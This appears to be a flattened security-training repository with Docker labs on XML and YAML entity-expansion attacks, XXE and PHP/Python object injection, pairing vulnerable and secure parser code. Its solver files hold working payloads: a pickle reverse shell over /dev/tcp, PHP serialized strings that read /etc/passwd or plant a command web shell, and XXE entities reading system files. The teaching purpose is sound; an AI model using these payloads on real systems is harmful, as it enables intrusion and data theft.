├── exercise
    └── object-injection
    │   ├── src
    │       ├── config.json
    │       ├── index.php
    │       ├── level0.php
    │       ├── level1.php
    │       ├── level2.php
    │       └── level3.php
    │   ├── solver
    │       ├── config.json
    │       ├── README.md
    │       ├── level2-payload.php
    │       └── level3-payload.php
    │   ├── php
    │       └── Dockerfile
    │   ├── nginx
    │       ├── Dockerfile
    │       └── default.conf
    │   ├── img
    │       ├── top.png
    │       ├── level0.png
    │       └── level1.png
    │   ├── README.md
    │   └── docker-compose.yml
├── zizen-kadai
    ├── kadai1
    │   ├── CVE-2019-16941
    │   │   ├── README.md
    │   │   └── payload.xml
    │   └── CVE-2019-13625
    │   │   └── project.prp
    ├── kadai3
    │   ├── solver.py
    │   └── quiz.py
    └── README.md
├── handson
    ├── yaml-parser
    │   ├── billion-laughs
    │   │   ├── Dockerfile
    │   │   ├── vulnerable.py
    │   │   ├── run.sh
    │   │   ├── README.md
    │   │   └── payload.yml
    │   └── quadratic-blowup
    │   │   ├── Dockerfile
    │   │   ├── vulnerable.py
    │   │   ├── run.sh
    │   │   └── README.md
    ├── xml-parser
    │   ├── billion-laughs
    │   │   ├── etree
    │   │   │   ├── Dockerfile
    │   │   │   ├── run.sh
    │   │   │   ├── README.md
    │   │   │   ├── secure.py
    │   │   │   └── vulnerable.py
    │   │   ├── sax
    │   │   │   ├── Dockerfile
    │   │   │   ├── run.sh
    │   │   │   ├── README.md
    │   │   │   ├── vulnerable.py
    │   │   │   └── secure.py
    │   │   ├── minidom
    │   │   │   ├── Dockerfile
    │   │   │   ├── run.sh
    │   │   │   ├── README.md
    │   │   │   ├── secure.py
    │   │   │   └── vulnerable.py
    │   │   └── pulldom
    │   │   │   ├── Dockerfile
    │   │   │   ├── run.sh
    │   │   │   ├── README.md
    │   │   │   ├── secure.py
    │   │   │   └── vulnerable.py
    │   ├── quadratic-blowup
    │   │   ├── sax
    │   │   │   ├── Dockerfile
    │   │   │   ├── run.sh
    │   │   │   ├── README.md
    │   │   │   ├── vulnerable.py
    │   │   │   └── secure.py
    │   │   ├── etree
    │   │   │   ├── Dockerfile
    │   │   │   ├── run.sh
    │   │   │   ├── vulnerable.py
    │   │   │   ├── secure.py
    │   │   │   └── README.md
    │   │   ├── minidom
    │   │   │   ├── Dockerfile
    │   │   │   ├── run.sh
    │   │   │   ├── README.md
    │   │   │   ├── secure.py
    │   │   │   └── vulnerable.py
    │   │   └── pulldom
    │   │   │   ├── Dockerfile
    │   │   │   ├── run.sh
    │   │   │   ├── secure.py
    │   │   │   ├── vulnerable.py
    │   │   │   └── README.md
    │   └── external-entity-expansion
    │   │   ├── pulldom
    │   │       ├── python3.7.1
    │   │       │   ├── Dockerfile
    │   │       │   ├── secure.py
    │   │       │   ├── vulnerable.py
    │   │       │   └── README.md
    │   │       └── python3.7.0
    │   │       │   ├── Dockerfile
    │   │       │   ├── secure.py
    │   │       │   ├── vulnerable.py
    │   │       │   └── README.md
    │   │   └── sax
    │   │       ├── python3.7.0
    │   │           ├── Dockerfile
    │   │           ├── vulnerable.py
    │   │           ├── secure.py
    │   │           └── README.md
    │   │       └── python3.7.1
    │   │           ├── Dockerfile
    │   │           ├── README.md
    │   │           ├── vulnerable.py
    │   │           └── secure.py
    └── object-injection
    │   └── serialize-poc.php
└── README.md


/exercise/object-injection/src/config.json:
--------------------------------------------------------------------------------
1 | {"name": "test"}


--------------------------------------------------------------------------------
/exercise/object-injection/solver/config.json:
--------------------------------------------------------------------------------
1 | {"name": "test"}


--------------------------------------------------------------------------------
/exercise/object-injection/php/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM php:7-fpm
2 | 
3 | 


--------------------------------------------------------------------------------
/exercise/object-injection/nginx/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM nginx:latest
2 | 
3 | COPY ./default.conf /etc/nginx/conf.d/default.conf


--------------------------------------------------------------------------------
/exercise/object-injection/img/top.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tkmru/seccamp2021-b5/HEAD/exercise/object-injection/img/top.png


--------------------------------------------------------------------------------
/exercise/object-injection/img/level0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tkmru/seccamp2021-b5/HEAD/exercise/object-injection/img/level0.png


--------------------------------------------------------------------------------
/exercise/object-injection/img/level1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tkmru/seccamp2021-b5/HEAD/exercise/object-injection/img/level1.png


--------------------------------------------------------------------------------
/zizen-kadai/kadai1/CVE-2019-16941/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2019-16941
2 | 
3 | ```
4 | $ nc -lvnp 1337
5 | Connection from 127.0.0.1:54488
6 | ```
7 | 


--------------------------------------------------------------------------------
/handson/yaml-parser/billion-laughs/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python
2 | WORKDIR /usr/local/bin
3 | COPY ./ .
4 | RUN ["chmod", "+x", "./run.sh"]
5 | ENTRYPOINT [ "./run.sh"]


--------------------------------------------------------------------------------
/handson/xml-parser/billion-laughs/etree/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python
2 | WORKDIR /usr/local/bin
3 | COPY ./ .
4 | RUN ["chmod", "+x", "./run.sh"]
5 | ENTRYPOINT [ "./run.sh"]


--------------------------------------------------------------------------------
/handson/xml-parser/billion-laughs/sax/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python
2 | WORKDIR /usr/local/bin
3 | COPY ./ .
4 | RUN ["chmod", "+x", "./run.sh"]
5 | ENTRYPOINT [ "./run.sh"]


--------------------------------------------------------------------------------
/handson/xml-parser/quadratic-blowup/sax/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python
2 | WORKDIR /usr/local/bin
3 | COPY ./ .
4 | RUN ["chmod", "+x", "./run.sh"]
5 | ENTRYPOINT [ "./run.sh"]


--------------------------------------------------------------------------------
/handson/yaml-parser/quadratic-blowup/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python
2 | WORKDIR /usr/local/bin
3 | COPY ./ .
4 | RUN ["chmod", "+x", "./run.sh"]
5 | ENTRYPOINT [ "./run.sh"]


--------------------------------------------------------------------------------
/handson/xml-parser/billion-laughs/minidom/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python
2 | WORKDIR /usr/local/bin
3 | COPY ./ .
4 | RUN ["chmod", "+x", "./run.sh"]
5 | ENTRYPOINT [ "./run.sh"]


--------------------------------------------------------------------------------
/handson/xml-parser/billion-laughs/pulldom/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python
2 | WORKDIR /usr/local/bin
3 | COPY ./ .
4 | RUN ["chmod", "+x", "./run.sh"]
5 | ENTRYPOINT [ "./run.sh"]


--------------------------------------------------------------------------------
/handson/xml-parser/quadratic-blowup/etree/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python
2 | WORKDIR /usr/local/bin
3 | COPY ./ .
4 | RUN ["chmod", "+x", "./run.sh"]
5 | ENTRYPOINT [ "./run.sh"]


--------------------------------------------------------------------------------
/handson/xml-parser/quadratic-blowup/minidom/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python
2 | WORKDIR /usr/local/bin
3 | COPY ./ .
4 | RUN ["chmod", "+x", "./run.sh"]
5 | ENTRYPOINT [ "./run.sh"]


--------------------------------------------------------------------------------
/handson/xml-parser/quadratic-blowup/pulldom/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python
2 | WORKDIR /usr/local/bin
3 | COPY ./ .
4 | RUN ["chmod", "+x", "./run.sh"]
5 | ENTRYPOINT [ "./run.sh"]


--------------------------------------------------------------------------------
/handson/xml-parser/external-entity-expansion/pulldom/python3.7.1/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:3.7.1
2 | WORKDIR /usr/local/bin
3 | COPY ./ .
4 | ENTRYPOINT [ "python", "vulnerable.py" ]


--------------------------------------------------------------------------------
/handson/yaml-parser/billion-laughs/vulnerable.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # coding: UTF-8
3 | 
4 | import yaml
5 | 
6 | with open("payload.yml") as f:
7 |     yml = yaml.load(f, Loader=yaml.SafeLoader)
8 |     print(yml)
9 | 


--------------------------------------------------------------------------------
/handson/yaml-parser/quadratic-blowup/vulnerable.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # coding: UTF-8
3 | 
4 | import yaml
5 | 
6 | with open("payload.yml") as f:
7 |     yml = yaml.load(f, Loader=yaml.SafeLoader)
8 |     print(yml)
9 | 


--------------------------------------------------------------------------------
/exercise/object-injection/README.md:
--------------------------------------------------------------------------------
 1 | # PHP Object Injection Exercise
 2 | 
 3 | ```
 4 | $ docker-compose build
 5 | $ docker-compose up
 6 | ```
 7 | 
 8 | ## screenshots
 9 | ![](./img/top.png)
10 | ![](./img/level0.png)
11 | ![](./img/level1.png)
12 | 


--------------------------------------------------------------------------------
/handson/xml-parser/external-entity-expansion/sax/python3.7.0/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:3.7.0
2 | WORKDIR /usr/local/bin
3 | COPY ./ .
4 | # RUN [ "pip", "install", "defusedxml" ]
5 | # ENTRYPOINT [ "python", "secure.py" ]
6 | ENTRYPOINT [ "python", "vulnerable.py" ]


--------------------------------------------------------------------------------
/handson/xml-parser/external-entity-expansion/pulldom/python3.7.0/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:3.7.0
2 | WORKDIR /usr/local/bin
3 | COPY ./ .
4 | # RUN [ "pip", "install", "defusedxml" ]
5 | # ENTRYPOINT [ "python", "secure.py" ]
6 | ENTRYPOINT [ "python", "vulnerable.py" ]


--------------------------------------------------------------------------------
/handson/xml-parser/external-entity-expansion/sax/python3.7.1/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:3.7.1
2 | WORKDIR /usr/local/bin
3 | COPY ./ .
4 | # RUN [ "pip", "install", "defusedxml" ]
5 | # ENTRYPOINT [ "python", "secure.py" ]
6 | ENTRYPOINT [ "python", "vulnerable.py" ]
7 | 


--------------------------------------------------------------------------------
/exercise/object-injection/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '3'
 2 | services:
 3 |   web:
 4 |     build: ./nginx
 5 |     ports:
 6 |       - "127.0.0.1:5000:80"
 7 |     depends_on:
 8 |       - php
 9 |   php:
10 |     build: ./php
11 |     volumes:
12 |       - ./src:/var/www/html


--------------------------------------------------------------------------------
/handson/xml-parser/external-entity-expansion/sax/python3.7.1/README.md:
--------------------------------------------------------------------------------
 1 | # External entity expansion on sax
 2 | 
 3 | ```
 4 | $ docker build . -t external-entity-expansion-sax-secure
 5 | $ docker run external-entity-expansion-sax-secure
 6 | Start: data
 7 | 
 8 | 
 9 | 
10 | End: data
11 | ```
12 | 


--------------------------------------------------------------------------------
/zizen-kadai/kadai1/CVE-2019-13625/project.prp:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!DOCTYPE aaa [
 3 | <!ENTITY % dtd SYSTEM "http://localhost:4444/xxe">
 4 | %dtd;
 5 | ]>
 6 | <FILE_INFO>
 7 |     <BASIC_INFO>
 8 |         <STATE NAME="OWNER" TYPE="string" VALUE="tkmru" />
 9 |     </BASIC_INFO>
10 | </FILE_INFO>
11 | 


--------------------------------------------------------------------------------
/handson/object-injection/serialize-poc.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | class Seccamp {
 3 |   private $year = 0;
 4 |   public function set_year($year){
 5 |     $this->year = $year;
 6 |   }
 7 |   public function get_year(){
 8 |     return $this->year;
 9 |   }
10 | }
11 | 
12 | $object = new Seccamp();
13 | $object->set_year(2021);
14 | echo serialize($object);


--------------------------------------------------------------------------------
/exercise/object-injection/solver/README.md:
--------------------------------------------------------------------------------
 1 | # 解くためのスクリプト
 2 | 
 3 | ```
 4 | $ php level2-payload.php
 5 | O:4:"Main":1:{s:4:"file";O:7:"Setting":1:{s:4:"path";s:11:"/etc/passwd";}}
 6 | ...
 7 | ```
 8 | 
 9 | ```
10 | $ php level3-payload.php 
11 | O:4:"Main":1:{s:4:"file";O:7:"Setting":1:{s:4:"path";s:57:"config.json; echo '<?php system($_GET["cmd"]);?>' > a.php";}}
12 | ...
13 | ```


--------------------------------------------------------------------------------
/handson/xml-parser/billion-laughs/etree/run.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | python vulnerable.py &
 4 | export PID=$!
 5 | 
 6 | for (( i=1; i<=10; i++ ))
 7 | do  
 8 |     KB=$(ps -p $PID -o rss | sed -e 's/RSS//g' -e 's/ //g'| tr -d '\n')
 9 |     CPU=$(ps -p $PID -o %cpu | sed -e 's/%CPU//g' -e 's/ //g'| tr -d '\n')
10 |     echo "CPU: $CPU %, Memory: $KB KB"
11 |     sleep 1
12 | done


--------------------------------------------------------------------------------
/handson/xml-parser/billion-laughs/minidom/run.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | python vulnerable.py &
 4 | export PID=$!
 5 | 
 6 | for (( i=1; i<=10; i++ ))
 7 | do  
 8 |     KB=$(ps -p $PID -o rss | sed -e 's/RSS//g' -e 's/ //g'| tr -d '\n')
 9 |     CPU=$(ps -p $PID -o %cpu | sed -e 's/%CPU//g' -e 's/ //g'| tr -d '\n')
10 |     echo "CPU: $CPU %, Memory: $KB KB"
11 |     sleep 1
12 | done


--------------------------------------------------------------------------------
/handson/xml-parser/billion-laughs/pulldom/run.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | python vulnerable.py &
 4 | export PID=$!
 5 | 
 6 | for (( i=1; i<=10; i++ ))
 7 | do  
 8 |     KB=$(ps -p $PID -o rss | sed -e 's/RSS//g' -e 's/ //g'| tr -d '\n')
 9 |     CPU=$(ps -p $PID -o %cpu | sed -e 's/%CPU//g' -e 's/ //g'| tr -d '\n')
10 |     echo "CPU: $CPU %, Memory: $KB KB"
11 |     sleep 1
12 | done


--------------------------------------------------------------------------------
/handson/xml-parser/billion-laughs/sax/run.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | python vulnerable.py &
 4 | export PID=$!
 5 | 
 6 | for (( i=1; i<=10; i++ ))
 7 | do  
 8 |     KB=$(ps -p $PID -o rss | sed -e 's/RSS//g' -e 's/ //g'| tr -d '\n')
 9 |     CPU=$(ps -p $PID -o %cpu | sed -e 's/%CPU//g' -e 's/ //g'| tr -d '\n')
10 |     echo "CPU: $CPU %, Memory: $KB KB"
11 |     sleep 1
12 | done


--------------------------------------------------------------------------------
/handson/xml-parser/quadratic-blowup/etree/run.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | python vulnerable.py &
 4 | export PID=$!
 5 | 
 6 | for (( i=1; i<=10; i++ ))
 7 | do  
 8 |     KB=$(ps -p $PID -o rss | sed -e 's/RSS//g' -e 's/ //g'| tr -d '\n')
 9 |     CPU=$(ps -p $PID -o %cpu | sed -e 's/%CPU//g' -e 's/ //g'| tr -d '\n')
10 |     echo "CPU: $CPU %, Memory: $KB KB"
11 |     sleep 1
12 | done


--------------------------------------------------------------------------------
/handson/xml-parser/quadratic-blowup/minidom/run.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | python vulnerable.py &
 4 | export PID=$!
 5 | 
 6 | for (( i=1; i<=10; i++ ))
 7 | do
 8 |     KB=$(ps -p $PID -o rss | sed -e 's/RSS//g' -e 's/ //g'| tr -d '\n')
 9 |     CPU=$(ps -p $PID -o %cpu | sed -e 's/%CPU//g' -e 's/ //g'| tr -d '\n')
10 |     echo "CPU: $CPU %, Memory: $KB KB"
11 |     sleep 1
12 | done


--------------------------------------------------------------------------------
/handson/xml-parser/quadratic-blowup/pulldom/run.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | python vulnerable.py &
 4 | export PID=$!
 5 | 
 6 | for (( i=1; i<=10; i++ ))
 7 | do
 8 |     KB=$(ps -p $PID -o rss | sed -e 's/RSS//g' -e 's/ //g'| tr -d '\n')
 9 |     CPU=$(ps -p $PID -o %cpu | sed -e 's/%CPU//g' -e 's/ //g'| tr -d '\n')
10 |     echo "CPU: $CPU %, Memory: $KB KB"
11 |     sleep 1
12 | done


--------------------------------------------------------------------------------
/handson/xml-parser/quadratic-blowup/sax/run.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | python vulnerable.py &
 4 | export PID=$!
 5 | 
 6 | for (( i=1; i<=10; i++ ))
 7 | do
 8 |     KB=$(ps -p $PID -o rss | sed -e 's/RSS//g' -e 's/ //g'| tr -d '\n')
 9 |     CPU=$(ps -p $PID -o %cpu | sed -e 's/%CPU//g' -e 's/ //g'| tr -d '\n')
10 |     echo "CPU: $CPU %, Memory: $KB KB"
11 |     sleep 1
12 | done


--------------------------------------------------------------------------------
/handson/yaml-parser/billion-laughs/run.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | pip install PyYaml
 4 | python vulnerable.py &
 5 | export PID=$!
 6 | 
 7 | for (( i=1; i<=10; i++ ))
 8 | do
 9 |     KB=$(ps -p $PID -o rss | sed -e 's/RSS//g' -e 's/ //g'| tr -d '\n')
10 |     CPU=$(ps -p $PID -o %cpu | sed -e 's/%CPU//g' -e 's/ //g'| tr -d '\n')
11 |     echo "CPU: $CPU %, Memory: $KB KB"
12 |     sleep 1
13 | done


--------------------------------------------------------------------------------
/handson/yaml-parser/quadratic-blowup/run.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | pip install PyYaml
 4 | python vulnerable.py &
 5 | export PID=$!
 6 | 
 7 | for (( i=1; i<=10; i++ ))
 8 | do
 9 |     KB=$(ps -p $PID -o rss | sed -e 's/RSS//g' -e 's/ //g'| tr -d '\n')
10 |     CPU=$(ps -p $PID -o %cpu | sed -e 's/%CPU//g' -e 's/ //g'| tr -d '\n')
11 |     echo "CPU: $CPU %, Memory: $KB KB"
12 |     sleep 1
13 | done


--------------------------------------------------------------------------------
/zizen-kadai/kadai3/solver.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import pickle
 5 | import socket
 6 | import os
 7 | import base64
 8 | 
 9 | class GetReverseShell(object):
10 |     def __reduce__(self):
11 |         return (os.system, ('/bin/sh </dev/tcp/localhost/1234 >&0 2>&0',))
12 | 
13 | payload = pickle.dumps(GetReverseShell())
14 | print(base64.urlsafe_b64encode(payload))
15 | 


--------------------------------------------------------------------------------
/handson/xml-parser/external-entity-expansion/pulldom/python3.7.0/secure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import defusedxml.pulldom as pulldom
 5 | 
 6 | data = '''\
 7 | <!DOCTYPE data [
 8 | <!ENTITY secret SYSTEM "file:///etc/passwd">
 9 | ]>
10 | <data>
11 |     &secret;
12 | </data>
13 | '''
14 | 
15 | doc = pulldom.parseString(data)
16 | for event, node in doc:
17 |     pass
18 | 


--------------------------------------------------------------------------------
/handson/xml-parser/external-entity-expansion/pulldom/python3.7.1/secure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import defusedxml.pulldom as pulldom
 5 | 
 6 | data = '''\
 7 | <!DOCTYPE data [
 8 | <!ENTITY secret SYSTEM "file:///etc/passwd">
 9 | ]>
10 | <data>
11 |     &secret;
12 | </data>
13 | '''
14 | 
15 | doc = pulldom.parseString(data)
16 | for event, node in doc:
17 |     pass
18 | 


--------------------------------------------------------------------------------
/handson/xml-parser/external-entity-expansion/pulldom/python3.7.0/vulnerable.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import xml.dom.pulldom as pulldom
 5 | 
 6 | data = '''\
 7 | <!DOCTYPE data [
 8 | <!ENTITY secret SYSTEM "file:///etc/passwd">
 9 | ]>
10 | <data>
11 |     &secret;
12 | </data>
13 | '''
14 | 
15 | doc = pulldom.parseString(data)
16 | for event, node in doc:
17 |     print(event, node)
18 | 


--------------------------------------------------------------------------------
/handson/xml-parser/external-entity-expansion/pulldom/python3.7.1/vulnerable.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import xml.dom.pulldom as pulldom
 5 | 
 6 | data = '''\
 7 | <!DOCTYPE data [
 8 | <!ENTITY secret SYSTEM "file:///etc/passwd">
 9 | ]>
10 | <data>
11 |     &secret;
12 | </data>
13 | '''
14 | 
15 | doc = pulldom.parseString(data)
16 | for event, node in doc:
17 |     print(event, node)
18 | 


--------------------------------------------------------------------------------
/handson/xml-parser/quadratic-blowup/etree/vulnerable.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import xml.etree.ElementTree as ET
 5 | 
 6 | size = 55000
 7 | entity = 'A' * size
 8 | refs = '&x;' * size
 9 | data = '''\
10 | <?xml version="1.0"?>
11 | <!DOCTYPE DoS [
12 | 	<!ENTITY x "{entity}">
13 | ]>
14 | <DoS>{entityReferences}</DoS>
15 | '''.format(entity=entity, entityReferences=refs)
16 | 
17 | root = ET.fromstring(data)
18 | 


--------------------------------------------------------------------------------
/zizen-kadai/kadai3/quiz.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import sys
 5 | import base64
 6 | import pickle
 7 | 
 8 | args = sys.argv
 9 | if len(args) != 2:
10 |     print('第一引数にBase64エンコードされた文字列を指定してください')
11 | 
12 | try:
13 |     data = base64.urlsafe_b64decode(args[1])
14 |     deserialized = pickle.loads(data)
15 |     print('deserialized: {0}'.format(deserialized))
16 | except:
17 |     print('Failed to deserialize')
18 | 


--------------------------------------------------------------------------------
/handson/xml-parser/quadratic-blowup/etree/secure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import defusedxml.ElementTree as ET
 5 | 
 6 | size = 55000
 7 | entity = 'A' * size
 8 | refs = '&x;' * size
 9 | data = '''\
10 | <?xml version="1.0"?>
11 | <!DOCTYPE DoS [
12 |     <!ENTITY x "{entity}">
13 | ]>
14 | <DoS>{entityReferences}</DoS>
15 | '''.format(entity=entity, entityReferences=refs)
16 | 
17 | root = ET.fromstring(data)
18 | 
19 | 


--------------------------------------------------------------------------------
/handson/xml-parser/billion-laughs/minidom/README.md:
--------------------------------------------------------------------------------
 1 | # Billion Laughs on minidom
 2 | 
 3 | ```
 4 | $ docker run billion-laughs-minidom
 5 | CPU: 0.0 %, Memory: 4952 KB
 6 | CPU: 100 %, Memory: 20580 KB
 7 | CPU: 100 %, Memory: 19936 KB
 8 | CPU: 100 %, Memory: 21944 KB
 9 | CPU: 100 %, Memory: 30192 KB
10 | CPU: 100 %, Memory: 37060 KB
11 | CPU: 100 %, Memory: 30652 KB
12 | CPU: 100 %, Memory: 27288 KB
13 | CPU: 100 %, Memory: 38904 KB
14 | CPU: 100 %, Memory: 43600 KB
15 | ```
16 | 


--------------------------------------------------------------------------------
/handson/xml-parser/quadratic-blowup/sax/README.md:
--------------------------------------------------------------------------------
 1 | # Quadratic Blowup on sax
 2 | 
 3 | ```
 4 | $ docker build . -t quadratic-blowup-sax
 5 | $ docker run quadratic-blowup-sax
 6 | CPU: 0.0 %, Memory: 588 KB
 7 | CPU: 96.0 %, Memory: 19484 KB
 8 | CPU: 98.5 %, Memory: 19484 KB
 9 | CPU: 99.0 %, Memory: 19484 KB
10 | CPU: 99.5 %, Memory: 19484 KB
11 | CPU:  %, Memory:  KB
12 | CPU:  %, Memory:  KB
13 | CPU:  %, Memory:  KB
14 | CPU:  %, Memory:  KB
15 | CPU:  %, Memory:  KB
16 | ```
17 | 


--------------------------------------------------------------------------------
/handson/xml-parser/quadratic-blowup/pulldom/secure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import defusedxml.pulldom as pulldom
 5 | 
 6 | size = 55000
 7 | entity = 'A' * size
 8 | refs = '&x;' * size
 9 | data = '''\
10 | <?xml version="1.0"?>
11 | <!DOCTYPE DoS [
12 |     <!ENTITY x "{entity}">
13 | ]>
14 | <DoS>{entityReferences}</DoS>
15 | '''.format(entity=entity, entityReferences=refs)
16 | 
17 | doc = pulldom.parseString(data)
18 | for event, node in doc:
19 |     pass
20 | 


--------------------------------------------------------------------------------
/handson/xml-parser/quadratic-blowup/pulldom/vulnerable.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import xml.dom.pulldom as pulldom
 5 | 
 6 | size = 55000
 7 | entity = 'A' * size
 8 | refs = '&x;' * size
 9 | data = '''\
10 | <?xml version="1.0"?>
11 | <!DOCTYPE DoS [
12 |     <!ENTITY x "{entity}">
13 | ]>
14 | <DoS>{entityReferences}</DoS>
15 | '''.format(entity=entity, entityReferences=refs)
16 | 
17 | doc = pulldom.parseString(data)
18 | for event, node in doc:
19 |     pass
20 | 


--------------------------------------------------------------------------------
/handson/xml-parser/billion-laughs/sax/README.md:
--------------------------------------------------------------------------------
 1 | # Billion Laughs on sax
 2 | 
 3 | ```
 4 | $ docker build . -t billion-laughs-sax
 5 | $ docker run billion-laughs-sax
 6 | CPU: 0.0 %, Memory: 4700 KB
 7 | CPU: 100 %, Memory: 20012 KB
 8 | CPU: 100 %, Memory: 20012 KB
 9 | CPU: 100 %, Memory: 20012 KB
10 | CPU: 100 %, Memory: 20012 KB
11 | CPU: 100 %, Memory: 20012 KB
12 | CPU: 100 %, Memory: 20012 KB
13 | CPU: 100 %, Memory: 20012 KB
14 | CPU: 100 %, Memory: 20012 KB
15 | CPU: 100 %, Memory: 20012 KB
16 | ```
17 | 


--------------------------------------------------------------------------------
/handson/yaml-parser/billion-laughs/README.md:
--------------------------------------------------------------------------------
 1 | # Billion Laughs on PyYAML
 2 | 
 3 | ```
 4 | $ docker build . -t billion-laughs-pyyaml
 5 | $ docker run billion-laughs-pyyaml
 6 | CPU: 0.0 %, Memory: 4844 KB
 7 | CPU: 100 %, Memory: 86140 KB
 8 | CPU: 100 %, Memory: 163840 KB
 9 | CPU: 100 %, Memory: 241104 KB
10 | CPU: 100 %, Memory: 319960 KB
11 | CPU: 100 %, Memory: 386624 KB
12 | CPU: 100 %, Memory: 462936 KB
13 | CPU: 100 %, Memory: 540896 KB
14 | CPU: 100 %, Memory: 618856 KB
15 | CPU: 100 %, Memory: 684044 KB
16 | ```
17 | 


--------------------------------------------------------------------------------
/handson/xml-parser/billion-laughs/pulldom/README.md:
--------------------------------------------------------------------------------
 1 | # Billion Laughs on pulldom
 2 | 
 3 | ```
 4 | $ docker build . -t billion-laughs-pulldom
 5 | $ docker run billion-laughs-pulldom
 6 | CPU: 0.0 %, Memory: 4844 KB
 7 | CPU: 100 %, Memory: 127240 KB
 8 | CPU: 100 %, Memory: 244192 KB
 9 | CPU: 100 %, Memory: 373816 KB
10 | CPU: 100 %, Memory: 464368 KB
11 | CPU: 100 %, Memory: 584488 KB
12 | CPU: 100 %, Memory: 714640 KB
13 | CPU: 100 %, Memory: 889672 KB
14 | CPU: 100 %, Memory: 970984 KB
15 | CPU: 100 %, Memory: 1109320 KB
16 | ```
17 | 


--------------------------------------------------------------------------------
/handson/xml-parser/quadratic-blowup/minidom/README.md:
--------------------------------------------------------------------------------
 1 | # Quadratic Blowup on minidom
 2 | 
 3 | ```
 4 | $ docker build . -t quadratic-blowup-minidom
 5 | $ docker run quadratic-blowup-minidom
 6 | CPU: 0.0 %, Memory: 592 KB
 7 | CPU: 100 %, Memory: 30320 KB
 8 | CPU: 100 %, Memory: 33648 KB
 9 | CPU: 100 %, Memory: 41280 KB
10 | CPU: 100 %, Memory: 41460 KB
11 | CPU: 100 %, Memory: 57720 KB
12 | CPU: 100 %, Memory: 76840 KB
13 | CPU: 100 %, Memory: 52620 KB
14 | CPU: 100 %, Memory: 59304 KB
15 | CPU: 100 %, Memory: 63684 KB
16 | ```
17 | 


--------------------------------------------------------------------------------
/handson/xml-parser/quadratic-blowup/minidom/secure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import defusedxml.minidom as minidom
 5 | 
 6 | size = 55000
 7 | entity = 'A' * size
 8 | refs = '&x;' * size
 9 | data = '''\
10 | <?xml version="1.0"?>
11 | <!DOCTYPE DoS [
12 |     <!ENTITY x "{entity}">
13 | ]>
14 | <DoS>{entityReferences}</DoS>
15 | '''.format(entity=entity, entityReferences=refs)
16 | 
17 | dom = minidom.parseString(data)
18 | for child in dom.childNodes:
19 |     for node in child.childNodes:
20 |         pass


--------------------------------------------------------------------------------
/handson/xml-parser/quadratic-blowup/minidom/vulnerable.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # coding: UTF-8
 3 | 
 4 | import xml.dom.minidom as minidom
 5 | 
 6 | size = 55000
 7 | entity = 'A' * size
 8 | refs = '&x;' * size
 9 | data = '''\
10 | <?xml version="1.0"?>
11 | <!DOCTYPE DoS [
12 |     <!ENTITY x "{entity}">
13 | ]>
14 | <DoS>{entityReferences}</DoS>
15 | '''.format(entity=entity, entityReferences=refs)
16 | 
17 | dom = minidom.parseString(data)
18 | for child in dom.childNodes:
19 |     for node in child.childNodes:
20 |         pass
21 | 


--------------------------------------------------------------------------------
/handson/xml-parser/external-entity-expansion/pulldom/python3.7.1/README.md:
--------------------------------------------------------------------------------
 1 | # External entity expansion on pulldom
 2 | 
 3 | ```
